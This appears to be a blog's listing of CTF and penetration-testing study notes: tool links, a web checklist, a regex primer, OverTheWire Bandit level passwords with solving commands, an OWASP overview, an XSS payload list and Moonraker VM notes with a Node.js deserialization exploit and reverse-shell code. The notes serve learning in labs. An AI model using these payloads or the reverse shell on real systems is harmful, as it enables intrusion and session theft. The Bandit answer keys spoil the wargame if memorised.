
Posts

Showing posts from January, 2019

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/
Encoding errors --> https://ftfy.now.sh/
File Signatures List --> Click here
PCAP Analysis --> https://www.packettotal.com/

Online Cipher Decryptors:
CyberChef - Cipher Decoder
CrackStation - Hash Cracker
Decrypt Any Kind of Hash
1) Cipher Statistics
2) Index of Coincidence Calculator - Online IC Cryptanalysis Tool
3) Tools List (Awesome and Fantastic Tools) Available on dCode
4) Solve an Aristocrat or Patristocrat
5) RSA attack tool (mainly for CTF) - retrieve private key from weak public key and/or uncipher data
5-1) RSA - Find PQ using N
6) BertNase's Own Hide content in an Image made of blocks - npiet fun!
7) Vigenere Solver - www.guballa.de
8) Fernet (Decode)
9) Unicode Text Steganography Encoders/Decoders
10) All in ONE Encoders and Decoders Tool
11) Cryptii - Decoder

Image Forensics:
1) Forensically, free online photo forensics tools - 29a.ch
2) StegSolve to decrypt data in

Consider

1) View the page source
2) Check robots.txt
3) Search all interesting names in Google
4) Use dirb to list all pages
5) Check for URLs
6) Intercept the page in Burp Suite and send it to Repeater (check the response)
7) If there is an input box, it might be a terminal
8) Note down all URLs; any of them might be an encryption code
9) Always try to brute-force; use cupp -i
10) Always dig into all the folders
11) Look for flags on every page
12) Check multiple times; the order is sometimes important
13) Consider all names and try them to log in
14) Check /license.txt for version numbers

Use online decoders --> https://2cyr.com/decode/

RegEx

--------------------------- REGULAR EXPRESSIONS -------------------------------------

/   regex     /
** Don't use "/" (forward slash) inside your regular expression; it should be used only at the start and end.
"Space" is also a regular expression.

------------------------|
Literal Characters:     |
------------------------|
1. Regex --> /ohn/     Test string --> ohn, john, mohn {only ohn is matched}
2. Regex --> /color/   String --> color, colour {color is matched}

------------------------|
Modes:                  |
------------------------|
Modes are placed after the ending /
/regex/mode
/regex/    {standard mode - nothing after the ending forward slash}
/regex/g   {global}
/regex/s   {single line mode}
/regex/i   {case INSensitive mode}
/regex/m   {multi line mode}

Global Mode: /regex/g
------------
global - more than one; all of the matched strings are selected at once

Case Insensitive: /regex/i "or" /regex/gi
--------------

Bandit CTF

ssh bandit7@bandit.labs.overthewire.org -p 2220

3 - UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
4 - pIwrPrtPN36QITSp3EQaw936yaFoFgAB
5 - koReBOKuIDDepwhWk7jZC0RTdopnAYKh
6 - DXjZPULLxYr17uwoI01bNLQbtFemEgo7
7 - HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
    --> find / -size 33c -user bandit7 -group bandit6 2>/dev/null
    --> cat /var/lib/dpkg/info/bandit7.password
8 - cvX2JJa4CFALtqS87jk27qwqGhBM9plV
    --> grep "millionth" data.txt
9 - UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
    --> cat data.txt | sort | uniq -c | grep 1   (unique value)
10 - truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
    --> strings data.txt | grep "=="   (search for something with the required text)
11 - IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
12 - 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
    --> cat data.txt | tr a-zA-Z n-za-mN-ZA-M   (find rot13 text)
13 - 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
14 - 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
    --> ssh -i sshkey.private bandit14@localhost
15 - BfMYroe26WYalil77FoDi9qh59eK5xNr
    --> echo 4wcYUJFw0k0XL

OWASP

OWASP OWASP is non profitable worldwide charitable organization focuses on improving the security of web applications, with the intension to make application security visible and to understand application security risks. OWASP is the group focused on understanding and improving the security of web applications and web services. Network Security Mostly Ignores the Contents of HTTP Traffic. SSL, Intrusion Detection Systems, Operating System Hardening, Database Hardening. Web Application Security is just as important as Network Security. ==================================          A1-Injection Attack: =================================== Injection attack is injecting malicious code to the application through input parameters of the application while the parameters being passed to the interpreters. There are different types of Injection attacks:  SQL injection is Injecting malicious SQL characters through the parameters manipulating the underlying queries affecting

XSS

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
alert(1)
"alert(1)"
*alert(1)*
"><svg%09onload=alert%26%230000000040document.cookie)>%09
‘; alert(1);
‘)alert(1);//
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro

Moonraker VM

nmap -p- -A 192.168.239.135 --open
tail -f /var/log/apache2/access.log
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
echo {"\"username\""}:"\"_\$\$ND_FUNC\$\$_function (){ eval(String.fromCharCode($(python exploit.py)) )}()\""} | base64 -w0

Exploit Payload: Something is wr
---------------
var net = require('net');
var spawn = require('child_process').spawn;
HOST="127.0.0.1";
PORT="1337";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected!\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);

GREP

Match everything after a word:
grep -Po 'WORD(.*)'
grep -oP '(?<=release)[^ ]*'
check this

Print all the directories in the given path with the full absolute path:
ls -d1 "$(pwd)"/*/

Grep inside a folder recursively:
grep -nr '100068 2,3,4,5 32800/udp cmsd'
grep -nr 'A Wordpress installation was found' | grep -v AutoRecon | cut -d '/' -f1 | sort -u

Grep IP addresses and ports from Nmap scan output:
egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' | sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g'
Output:
127.0.0.1 80,443
127.0.0.2 8080, 9191

List directories which don't contain a sub-directory named recon:
find . -type d -exec test -e "{}/recon" \; -prune -o -type d -print | cut -d '/' -f2

Grep data from multiple webpages and print everything after a given word:
for ip in $(cat $1);